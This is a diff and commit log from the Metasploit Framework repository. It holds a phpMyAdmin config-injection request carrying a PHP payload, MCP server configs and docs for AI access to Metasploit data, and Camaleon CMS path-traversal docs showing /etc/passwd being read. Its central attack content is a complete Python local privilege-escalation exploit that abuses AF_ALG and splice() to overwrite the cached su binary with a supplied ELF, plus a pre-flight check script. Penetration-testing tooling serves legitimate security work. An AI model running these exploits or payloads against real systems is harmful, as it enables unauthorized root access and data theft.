Content-Type: application/x-www-form-urlencoded
Cookie: phpMyAdmin=3d88785a775a6bdd4a4eee4d7ce5fe7b99a802bb; pma_lang=en-utf-8; pma_charset=utf-8; pma_mcrypt_iv=Mc1O5ByaScc%3D; phpMyAdmin=aeb5279f061348c557a7c366abb67deefe14b535
Content-Length: 109

token=e555e9ff29b23a81ff9d20affa616a8b&eol=unix&textconfig=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E&submit_save=Save
```
2026-03-31 07:07:49 +01:00
g0t mi1k cc3f76d586 phpmyadmin_config: Reformat code 2026-03-31 07:07:49 +01:00
g0t mi1k bf28b0d3e7 phpmyadmin_config: Add v3.1.x
As it turns out, this is part of CVE-2009-1285 (<= v3.1.3.1)
This does not exploit CVE-2009-1151 for v3.1.x
2026-03-31 07:07:49 +01:00
g0t mi1k d6914f0812 phpmyadmin_config: Reformat exploit 2026-03-31 07:07:41 +01:00
g0t mi1k 6cc3e391f7 phpmyadmin_config: Add check 2026-03-31 07:05:54 +01:00
BootstrapBool 31b58e7deb msftidy changes 2026-03-14 23:38:04 -04:00
BootstrapBool 5b9dc0f5ed Merge branch 'master' into camaleon_cms_cve_2024_46987 2026-03-14 23:33:27 -04:00
BootstrapBool aa2725150c Removes python camaleon module, adds ruby camaleon module
Updates documentation
2026-03-14 23:32:44 -04:00
BootstrapBool 25f6f6b7ae Moves camaleon_traversal module to auxiliary/gather
Adds missing options to documentation

Makes verbose option not required

Changes VHOST option type - some reason "address" type domain names were
marked as "invalid"
2026-03-07 18:36:36 -05:00
BootstrapBool d65cc5694f Adds camaleon_traversal module/documentation 2026-03-06 23:16:52 -05:00
1340 changed files with 28102 additions and 5309 deletions
@@ -284,21 +284,21 @@ jobs:
run: |
Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
dir
$InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
$WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
$Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
$process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
if ($process.ExitCode -eq 0) {
Write-Host "components have been successfully added"
} else {
Write-Host "components were not installed"
exit 1
}
Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
$r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
Write-Host $r
$r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
Write-Host $r
# $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
# $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
# $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
# $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
# if ($process.ExitCode -eq 0) {
# Write-Host "components have been successfully added"
# } else {
# Write-Host "components were not installed"
# exit 1
# }
# Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
# $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
# Write-Host $r
# $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
# Write-Host $r
working-directory: metasploit-payloads
- name: Build Windows payloads via Visual Studio 2025 Build (Windows)
+2
View File
@@ -53,5 +53,7 @@ group :test do
gem 'allure-rspec'
# Manipulate Time.now in specs
gem 'timecop'
# stub and set expectations on HTTP requests
gem 'webmock', '~> 3.18'
end
+24 -9
View File
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (6.4.128)
metasploit-framework (6.4.132)
aarch64
abbrev
actionpack (~> 7.2.0)
@@ -42,6 +42,7 @@ PATH
jsobfu
json
lru_redux
mcp (= 0.13.0)
metasm
metasploit-concern
metasploit-credential (>= 6.0.21)
@@ -223,6 +224,9 @@ GEM
concurrent-ruby (1.3.5)
connection_pool (2.5.4)
cookiejar (0.3.4)
crack (1.0.1)
bigdecimal
rexml
crass (1.0.6)
csv (3.3.2)
daemons (1.4.1)
@@ -281,6 +285,7 @@ GEM
gyoku (1.4.0)
builder (>= 2.1.2)
rexml (~> 3.0)
hashdiff (1.2.1)
hashery (2.1.2)
hrr_rb_ssh (0.4.2)
hrr_rb_ssh-ed25519 (0.4.2)
@@ -304,6 +309,9 @@ GEM
jsobfu (0.4.2)
rkelly-remix
json (2.15.1)
json-schema (6.2.0)
addressable (~> 2.8)
bigdecimal (>= 3.1, < 5)
language_server-protocol (3.17.0.5)
license_finder (5.11.1)
bundler
@@ -322,6 +330,8 @@ GEM
crass (~> 1.0.2)
nokogiri (>= 1.12.0)
lru_redux (1.1.0)
mcp (0.13.0)
json-schema (>= 4.1)
memory_profiler (1.1.0)
metasm (1.0.5)
metasploit-concern (5.0.5)
@@ -331,7 +341,7 @@ GEM
mutex_m
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.21)
metasploit-credential (6.0.23)
bigdecimal
csv
drb
@@ -353,17 +363,17 @@ GEM
mutex_m
railties (~> 7.0)
metasploit-payloads (2.0.245)
metasploit_data_models (6.0.15)
activerecord (~> 7.0)
activesupport (~> 7.0)
metasploit_data_models (6.0.18)
activerecord (>= 7.0, < 8.1)
activesupport (>= 7.0, < 8.1)
arel-helpers
bigdecimal
drb
metasploit-concern
metasploit-model (~> 5.0.4)
metasploit-model (>= 5.0.4)
mutex_m
pg
railties (~> 7.0)
railties (>= 7.0, < 8.1)
recog
webrick
metasploit_payloads-mettle (1.0.46)
@@ -498,7 +508,7 @@ GEM
rex-struct2
rex-text
rex-core (0.1.36)
rex-encoder (0.1.8)
rex-encoder (0.1.10)
metasm
rex-arch
rex-text
@@ -531,7 +541,7 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.64)
rex-socket (0.1.65)
dnsruby
rex-core
rex-sslscan (0.1.13)
@@ -649,6 +659,10 @@ GEM
useragent (0.16.11)
warden (1.2.9)
rack (>= 2.0.9)
webmock (3.26.2)
addressable (>= 2.8.0)
crack (>= 0.3.2)
hashdiff (>= 0.4.0, < 2.0.0)
webrick (1.9.1)
websocket-driver (0.7.7)
base64
@@ -699,6 +713,7 @@ DEPENDENCIES
simplecov (= 0.18.2)
test-prof
timecop
webmock (~> 3.18)
yard
BUNDLED WITH
+7 -2
View File
@@ -39,6 +39,7 @@ coderay, 1.1.3, MIT
concurrent-ruby, 1.3.5, MIT
connection_pool, 2.5.4, MIT
cookiejar, 0.3.4, "Simplified BSD"
crack, 1.0.1, MIT
crass, 1.0.6, MIT
csv, 3.3.2, "ruby, Simplified BSD"
daemons, 1.4.1, MIT
@@ -71,6 +72,7 @@ forwardable, 1.3.3, "ruby, Simplified BSD"
getoptlong, 0.2.1, "ruby, Simplified BSD"
gssapi, 1.3.1, MIT
gyoku, 1.4.0, MIT
hashdiff, 1.2.1, MIT
hashery, 2.1.2, "Simplified BSD"
hrr_rb_ssh, 0.4.2, "Apache 2.0"
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
@@ -85,6 +87,7 @@ irb, 1.15.2, "ruby, Simplified BSD"
jmespath, 1.6.2, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.15.1, ruby
json-schema, 6.2.0, MIT
language_server-protocol, 3.17.0.5, MIT
license_finder, 5.11.1, MIT
lint_roller, 1.1.0, MIT
@@ -93,14 +96,15 @@ logger, 1.7.0, "ruby, Simplified BSD"
logging, 2.4.0, MIT
loofah, 2.24.1, MIT
lru_redux, 1.1.0, MIT
mcp, 0.13.0, "Apache 2.0"
memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.5, "New BSD"
metasploit-credential, 6.0.21, "New BSD"
metasploit-framework, 6.4.128, "New BSD"
metasploit-framework, 6.4.132, "New BSD"
metasploit-model, 5.0.4, "New BSD"
metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.15, "New BSD"
metasploit_data_models, 6.0.18, "New BSD"
metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
method_source, 1.1.0, MIT
mime-types, 3.7.0, MIT
@@ -233,6 +237,7 @@ unicode-emoji, 4.1.0, MIT
unix-crypt, 1.3.1, 0BSD
useragent, 0.16.11, MIT
warden, 1.2.9, MIT
webmock, 3.26.2, MIT
webrick, 1.9.1, "ruby, Simplified BSD"
websocket-driver, 0.7.7, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
+33
View File
@@ -0,0 +1,33 @@
# Metasploit RPC API connection (MessagePack)
msf_api:
type: messagepack
host: localhost
port: 55553
ssl: true
endpoint: /api/
user: msfuser
password: CHANGEME
auto_start_rpc: true # Automatically start the RPC server if not running (default: true)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
+32
View File
@@ -0,0 +1,32 @@
# Metasploit RPC API connection (JSON-RPC)
msf_api:
type: json-rpc
host: localhost
port: 8081
ssl: true
endpoint: /api/v1/json-rpc
token: YOUR_BEARER_TOKEN_HERE
# auto_start_rpc is not supported for JSON-RPC (only MessagePack)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
File diff suppressed because one or more lines are too long
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/env python3
"""Pre-flight check: verify the kernel crypto primitives needed by the exploit.

Confirms that the kernel exposes /proc/crypto, that the AF_ALG socket family
is available, and that the target AEAD template can be instantiated. Prints
a status line and returns a boolean so the caller can exit(1) on failure.
"""
import os
import socket
import sys

# AF_ALG from linux/socket.h; spelled out because socket.AF_ALG is not
# exported by every Python build.
AF_ALG = 38
# AEAD template the exploit binds to -- must match the exploit script.
ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"


def check():
    """Return True when the exploit's AF_ALG AEAD socket can be created."""
    if not os.path.exists('/proc/crypto'):
        # No crypto API procfs entry => kernel crypto userspace API absent.
        print('[-] /proc/crypto is missing.')
        return False
    try:
        s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError as e:
        # e.strerror may be None (e.g. for some constructor failures);
        # fall back to str(e) so the message never raises TypeError.
        print('[-] AF_ALG socket family unavailable (' + (e.strerror or str(e)) + ').')
        return False
    try:
        s.bind(("aead", ALG_NAME))
    except OSError as e:
        print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + (e.strerror or str(e)) + ').')
        return False
    finally:
        # Close the probe socket whether or not the bind succeeded.
        s.close()
    print('[+] The exploit socket has been created, encryption primitives are available.')
    return True


if __name__ == '__main__':
    if not check():
        sys.exit(1)
@@ -0,0 +1,9 @@
import os
import shutil

# Evict the cached pages of the `su` binary from the page cache.
# POSIX_FADV_DONTNEED with offset=0, length=0 applies to the whole file.
binary_path = shutil.which('su')
fd = os.open(binary_path, os.O_RDONLY)
try:
    os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
finally:
    # Always release the descriptor, even if the fadvise call fails.
    os.close(fd)
+56
View File
@@ -0,0 +1,56 @@
#!/usr/bin/env python3
# Exploit driver: uses a Linux AF_ALG AEAD socket plus splice() to write
# attacker-controlled bytes over the page-cache copy of the `su` binary,
# then executes `su` so the patched pages run.
# Usage: script.py <base64(zlib-compressed ELF)> [extra su args...]
# NOTE(review): the exact kernel bug being abused is not identified in this
# file -- presumably a known AF_ALG/splice page-cache write primitive; confirm
# against the accompanying module/advisory before relying on these comments.
import os
import base64
import shutil
import socket
import sys
import zlib

# Constants from linux/if_alg.h / linux/socket.h (not exposed by the socket
# module on all Python builds).
AF_ALG = 38
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
SOL_ALG = 279


def setup_sock():
    # Create and configure the AF_ALG AEAD socket, returning the accepted
    # operation socket used for the actual crypto requests.
    sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    # Bind to the authencesn(hmac(sha256),cbc(aes)) AEAD template.
    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    # Key blob: 8-byte rta header ("0800010000000010") followed by a 32-byte
    # all-zero key (64 hex zeros) -- matches the template's key layout.
    sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
    # 4-argument setsockopt form: value=None, optlen=4 -> auth tag size of 4
    # bytes, which is why each write() below carries a 4-byte chunk.
    sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
    op_sock, _ = sock.accept()
    return op_sock


def write(op_sock, su_fd, offset, chunk):
    # Write one 4-byte `chunk` of the payload at byte `offset` of su's
    # page-cache pages, by splicing file pages into an in-flight AEAD op.
    op_sock.sendmsg(
        # 4 filler bytes ahead of the chunk; ancillary data selects a
        # decrypt op (ALG_SET_OP = 0), a 16-byte IV (0x10 length prefix,
        # zero IV), and an 8-byte AAD length.
        [b"A" * 4 + chunk],
        [
            (SOL_ALG, ALG_SET_OP, b'\x00\x00\x00\x00'),
            (SOL_ALG, ALG_SET_IV, b'\x10' + b'\x00' * 19),
            (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b'\x08\x00\x00\x00')
        ],
        # 32768 == MSG_MORE on Linux: keep the request open so the spliced
        # pages below become part of the same operation.
        32768
    )
    r, w = os.pipe()
    # Splice offset+4 bytes of `su` (from file offset 0) into the pipe, then
    # from the pipe into the crypto op -- this hands the kernel references to
    # su's page-cache pages rather than copies.
    os.splice(su_fd, w, offset + 4, offset_src=0)
    os.splice(r, op_sock.fileno(), offset + 4)
    try:
        # Trigger processing of the queued request; failure is expected and
        # irrelevant -- the page-cache write has already happened.
        op_sock.recv(8 + offset)
    except:
        pass


su_path = shutil.which('su')
su_fd = os.open(su_path, os.O_RDONLY)
try:
    # Payload arrives as argv[1]: base64-encoded, zlib-compressed ELF.
    elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
except:
    print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
    sys.exit(os.EX_USAGE)
op_sock = setup_sock()
# Overwrite su's cached pages 4 bytes at a time (matches the 4-byte auth
# tag size configured in setup_sock).
for i in range(0, len(elf), 4):
    write(op_sock, su_fd, i, elf[i:i + 4])
op_sock.close()
# Execute `su`, which now runs the injected ELF from the dirtied page cache.
os.execvp(su_path, ["su"] + sys.argv[1:])
+1649 -1260
View File
File diff suppressed because it is too large Load Diff
+3 -1
View File
@@ -10,7 +10,7 @@
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema[7.2].define(version: 2026_01_30_124052) do
ActiveRecord::Schema[7.2].define(version: 2026_04_11_000000) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
@@ -665,6 +665,8 @@ ActiveRecord::Schema[7.2].define(version: 2026_01_30_124052) do
t.integer "session_id"
t.integer "loot_id"
t.text "fail_detail"
t.string "check_code"
t.text "check_detail"
end
create_table "vuln_details", id: :serial, force: :cascade do |t|
@@ -0,0 +1,366 @@
The Metasploit MCP Server (`msfmcpd`) provides AI applications with secure, structured access to Metasploit Framework data through the [Model Context Protocol](https://modelcontextprotocol.io/) (MCP). It acts as a middleware layer between AI clients (such as Claude, Cursor, or custom agents) and Metasploit, exposing 8 standardized tools for querying reconnaissance data and searching modules.
This initial implementation is **read-only**. Only tools that query data (modules, hosts, services, vulnerabilities, etc.) are available. Tools for module execution, session interaction, and database modifications will be added in a future iteration.
## Architecture
```mermaid
flowchart TD
ai_app["AI Application<br>(Claude, Cursor, etc.)"]
subgraph msfmcp_server["MsfMcp Server"]
mcp_layer["MCP Layer (8 Tools)<br>Input Validation / Rate Limiting / Response Transformation"]
rpc_manager["RPC Manager<br>Auto-detect / Auto-start / Lifecycle Management"]
api_client["Metasploit API Client<br>MessagePack RPC (port 55553) / JSON-RPC (port 8081)<br>Session Management"]
mcp_layer --> rpc_manager
rpc_manager --> api_client
end
msf["Metasploit Framework<br>(msfrpcd)"]
ai_app -- "MCP Protocol (stdio or HTTP)<br>JSON-RPC 2.0" --> mcp_layer
api_client -- "HTTP/HTTPS" --> msf
```
## Quick Start
The simplest way to start the MCP server is with no arguments:
```
./msfmcpd
```
The server automatically detects whether a Metasploit RPC server is already running on the configured port. If not, it starts one automatically with randomly generated credentials.
To use specific credentials:
```
./msfmcpd --user your_username --password your_password
```
## Configuration
### Configuration File
Copy the example configuration and edit it:
```
cp config/mcp_config.yaml.example config/mcp_config.yaml
```
A MessagePack RPC configuration looks like this:
```yaml
msf_api:
type: messagepack
host: localhost
port: 55553
ssl: true
endpoint: /api/
user: msfuser
password: CHANGEME
auto_start_rpc: true
mcp:
transport: stdio
rate_limit:
enabled: true
requests_per_minute: 60
burst_size: 10
logging:
enabled: false
level: INFO
log_file: msfmcp.log
```
For JSON-RPC with bearer token authentication, use the JSON-RPC example instead:
```
cp config/mcp_config_jsonrpc.yaml.example config/mcp_config.yaml
```
### Command-Line Options
```
./msfmcpd --help
Options:
--config PATH Path to configuration file
--enable-logging Enable file logging with sanitization
--log-file PATH Log file path (overrides config file)
--user USER MSF API username (for MessagePack auth)
--password PASS MSF API password (for MessagePack auth)
--no-auto-start-rpc Disable automatic RPC server startup
--mcp-transport TRANSPORT MCP server transport type ('stdio' or 'http')
-h, --help Show this help message
-v, --version Show version information
```
### Environment Variable Overrides
All configuration settings can be overridden by environment variables:
| Variable | Description |
|---|---|
| `MSF_API_TYPE` | Connection type (`messagepack` or `json-rpc`) |
| `MSF_API_HOST` | Metasploit RPC API host |
| `MSF_API_PORT` | Metasploit RPC API port |
| `MSF_API_SSL` | Use SSL for Metasploit RPC API (`true` or `false`) |
| `MSF_API_ENDPOINT` | Metasploit RPC API endpoint |
| `MSF_API_USER` | RPC API username (for MessagePack auth) |
| `MSF_API_PASSWORD` | RPC API password (for MessagePack auth) |
| `MSF_API_TOKEN` | RPC API token (for JSON-RPC auth) |
| `MSF_AUTO_START_RPC` | Auto-start RPC server (`true` or `false`) |
| `MSF_MCP_TRANSPORT` | MCP transport type (`stdio` or `http`) |
| `MSF_MCP_HOST` | MCP server host (for HTTP transport) |
| `MSF_MCP_PORT` | MCP server port (for HTTP transport) |
Example using environment variables:
```
MSF_API_HOST=192.168.33.44 ./msfmcpd --config ./config/mcp_config.yaml
```
## Automatic RPC Server Management
When using MessagePack RPC on localhost, the MCP server can automatically manage the Metasploit RPC server lifecycle. This is enabled by default.
### How It Works
1. **Detection**: On startup, the MCP server probes the configured RPC port to check if a server is already running.
2. **Auto-start**: If no server is detected, it spawns the `msfrpcd` executable as a child process.
3. **Credentials**: If no username and password are provided, random credentials are generated automatically and used for both the RPC server and client authentication.
4. **Wait**: After starting, it polls the port until the RPC server becomes available (timeout: 30 seconds).
5. **Shutdown**: When the MCP server shuts down (via Ctrl+C or SIGTERM), it cleans up the managed RPC process.
**Note**: If an RPC server is already running, credentials must be provided via `--user`/`--password`, config file, or environment variables to authenticate with it.
### Database Support
The auto-started RPC server creates a framework instance with database support enabled by default. If the database is not running when the RPC server starts, a warning is displayed:
```
[WARNING] Database is not available. Some MCP tools that rely on the database will not work.
[WARNING] Start the database and restart the MCP server to enable full functionality.
```
Tools that query the database (`msf_host_info`, `msf_service_info`, `msf_vulnerability_info`, `msf_note_info`, `msf_credential_info`, `msf_loot_info`) require a running database. To initialize and start the database:
```
msfdb init
msfdb start
```
Then restart the MCP server.
### Disabling Auto-Start
Auto-start can be disabled in three ways:
- CLI flag: `--no-auto-start-rpc`
- Config file: `auto_start_rpc: false` in the `msf_api` section
- Environment variable: `MSF_AUTO_START_RPC=false`
Auto-start is also not available when:
- The API type is `json-rpc` (requires SSL certificates and a web server)
- The host is a remote address (cannot start a server on a remote machine)
When auto-start is disabled and no RPC server is running, you must start `msfrpcd` manually:
```
msfrpcd -U your_username -P your_password -p 55553
```
## MCP Tools
The server exposes 8 tools to AI applications via the MCP protocol.
### msf_search_modules
Search for Metasploit modules by keywords, CVE IDs, or module names.
- `query` (string, required): Search terms (e.g., `windows smb`, `CVE-2017-0144`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_module_info
Get detailed information about a specific Metasploit module.
- `type` (string, required): Module type (`exploit`, `auxiliary`, `post`, `payload`, `encoder`, `nop`)
- `name` (string, required): Module path (e.g., `windows/smb/ms17_010_eternalblue`)
Returns complete module details including options, targets, references, and authors.
### msf_host_info
Query discovered hosts from the Metasploit database.
- `workspace` (string, optional): Workspace name (default: `default`)
- `addresses` (string, optional): Filter by IP/CIDR (e.g., `192.168.1.0/24`)
- `only_up` (boolean, optional): Only return alive hosts (default: false)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_service_info
Query discovered services on hosts.
- `workspace` (string, optional): Workspace name
- `names` (string, optional): Filter by service names, comma-separated (e.g., `http`, `ldap,ssh`)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range (e.g., `80,443` or `1-1024`)
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `only_up` (boolean, optional): Only return running services (default: false)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_vulnerability_info
Query discovered vulnerabilities.
- `workspace` (string, optional): Workspace name
- `names` (array of strings, optional): Filter by vulnerability names (exact, case-sensitive module names)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_note_info
Query notes stored in the database.
- `workspace` (string, optional): Workspace name
- `type` (string, optional): Filter by note type (e.g., `ssl.certificate`, `smb.fingerprint`)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_credential_info
Query discovered credentials.
- `workspace` (string, optional): Workspace name
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_loot_info
Query collected loot (files, data dumps).
- `workspace` (string, optional): Workspace name
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
## Integration with AI Applications
Add the MCP server to your AI application configuration. The exact format depends on the client.
### Claude Desktop / Cursor
```json
{
"mcpServers": {
"metasploit": {
"command": "/path/to/metasploit-framework/msfmcpd",
"args": [
"--config",
"/path/to/config/mcp_config.yaml"
],
"env": {}
}
}
}
```
### Using RVM
If you use RVM to manage Ruby versions, specify the full path to RVM so the correct Ruby and gemset are used:
```json
{
"mcpServers": {
"metasploit": {
"command": "/your/home_dir/.rvm/bin/rvm",
"args": [
"in",
"/path/to/metasploit-framework",
"do",
"./msfmcpd",
"--config",
"config/mcp_config.yaml"
]
}
}
}
```
## Security Considerations
### Input Validation
All tool parameters are validated against strict JSON schemas. IP addresses are validated using Ruby's `IPAddr` class with CIDR support, workspace names are restricted to alphanumeric characters plus underscore/hyphen, port ranges are validated (1-65535), and search queries are limited to 500 characters.
### Credential Management
Configuration files should use `chmod 600` permissions. Credentials are transmitted securely to the Metasploit Framework API and are never cached or logged by the MCP server.
### Rate Limiting
The server applies rate limiting to all MCP tools using a token bucket algorithm. Default: 60 requests per minute with a burst of 10 requests. This is configurable in the `rate_limit` section of the configuration file.
### Logging
Logging is disabled by default. When enabled (via `--enable-logging` or config), sensitive data (passwords, tokens, API keys) is automatically redacted. Log files should be protected with `chmod 600`.
### Error Handling
Stack traces are never exposed to clients. Error messages are sanitized to avoid leaking credentials. Metasploit API errors are wrapped in the MCP error format.
## Testing with MCP Inspector
The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is an interactive developer tool for testing and debugging MCP servers. It runs directly through `npx`:
```
npx @modelcontextprotocol/inspector
```
## Troubleshooting
### Connection Refused or Timeout
1. Verify the RPC daemon is running: `ps aux | grep msfrpcd`
2. Check the port is listening: `netstat -an | grep 55553`
3. Test connectivity: `curl -k -v https://localhost:55553/api/`
### Authentication Failures
For MessagePack RPC, verify the username and password in your configuration file or CLI arguments. For JSON-RPC, verify the bearer token is valid and has not expired.
### Database Not Available
If database-dependent tools return errors, ensure the database is running:
```
msfdb init
msfdb start
```
Then restart the MCP server.
### Rate Limit Exceeded
Increase the rate limit in your configuration file:
```yaml
rate_limit:
requests_per_minute: 120
burst_size: 20
```
+3
View File
@@ -448,6 +448,9 @@ NAVIGATION_CONFIG = [
{
path: 'How-to-use-Metasploit-with-ngrok.md'
},
{
path: 'How-to-use-Metasploit-MCP-Server.md'
},
]
},
]
@@ -0,0 +1,216 @@
## Vulnerable Application
This module attempts to read files via an authenticated directory traversal vulnerability in Camaleon CMS versions <= 2.8.0 and version 2.9.0.
CVE-2024-46987 mistakenly indicates that versions 2.8.1 and 2.8.2 are also vulnerable; however, this is not the case.
## Setup
See [Camaleon CMS](https://github.com/owen2345/camaleon-cms) documentation.
The following describes how to setup Camaleon CMS version 2.8.0 on Ubuntu.
### Requirements
- Rails 6.1+
- PostgreSQL, MySQL 5+ or SQLite
- Ruby 3.0+
- Imagemagick
### Install Ruby
guides.rubyonrails.org/install_ruby_on_rails.html
~~~bash
sudo apt install build-essential rustc libssl-dev libyaml-dev zlib1g-dev libgmp-dev git curl
~~~
### Install Mise
~~~bash
curl https://mise.run | sh
echo "eval \"\$(~/.local/bin/mise activate)\"" >> ~/.bashrc
source ~/.bashrc
~~~
### Install Ruby with Mise
~~~bash
$ mise use -g ruby@3.0
$ ruby --version
ruby 3.0.7p220 ...
~~~
### Install Imagemagick
~~~bash
sudo apt install --no-install-recommends imagemagick
~~~
### Install Postgresql
~~~bash
sudo apt install postgresql
~~~
### Install Rails
~~~bash
$ gem install rails -v 6.1
~~~
#### concurrent-ruby Issue
Downgrade concurrent-ruby to 1.3.4
~~~bash
$ gem list concurrent-ruby
concurrent-ruby (1.3.6)
$ gem install concurrent-ruby -v 1.3.4
$ gem uninstall concurrent-ruby -v 1.3.6
$ rails --version
Rails 6.1.7.10
~~~
### Create Rails Project
Run `rails new camaleon_project`
### Gemfile
In your Gemfile do the following:
Replace `gem 'spring'` with `gem 'spring', '4.2.1'`
Delete this line to prevent [conflict](https://github.com/owen2345/camaleon-cms/issues/1111): `gem 'sass-rails', '>= 6'`
Put these lines at the bottom of your Gemfile:
~~~
gem 'camaleon_cms', '2.8.0'
gem 'concurrent-ruby', '1.3.4'
~~~
### Install Bundle
From the project directory run `bundle install`
### Webpacker.yml Issue
~~~bash
wget -O camaleon_project/config/webpacker.yml https://raw.githubusercontent.com/rails/webpacker/master/lib/install/config/webpacker.yml
~~~
### Camaleon CMS Installation
~~~bash
rails generate camaleon_cms:install
rake camaleon_cms:generate_migrations
rake db:migrate
~~~
### Run Rails
~~~bash
bundle exec rails server -b 0.0.0.0
~~~
Navigate to `http://{ip address}:3000` and enter test under the Name field.
### Setup Server
When prompted with the new installation page just enter "test" into the Name field and continue.
#### Create Unprivileged User (Optional)
Navigate to `http://{ip address}:3000/admin` - login with the default admin credentials "admin:admin123"
Then navigate to "Users -> + Add User" and fill out the form.
## Verification Steps
1. Do: `use auxiliary/gather/camaleon_download_private_file`
2. Do: `set RHOST [IP]`
3. Do: `run`
## Options
### FILEPATH
The filepath of the file to read.
### DEPTH
The number of "../" appended to the filename. Default is 13
## Scenarios
```
msf > use auxiliary/gather/camaleon_download_private_file
msf auxiliary(gather/camaleon_download_private_file) > set rhost 10.0.0.45
rhost => 10.0.0.45
msf auxiliary(gather/camaleon_download_private_file) > set rport 3000
rport => 3000
msf auxiliary(gather/camaleon_download_private_file) > set ssl false
ssl => false
msf auxiliary(gather/camaleon_download_private_file) > run
[*] Running module against 10.0.0.45
[+] /etc/passwd stored as '/home/kali/.msf4/loot/20260411192711_default_10.0.0.45_camaleon.travers_926890.txt'
root:x:0:0:root:/root:/bin/bash
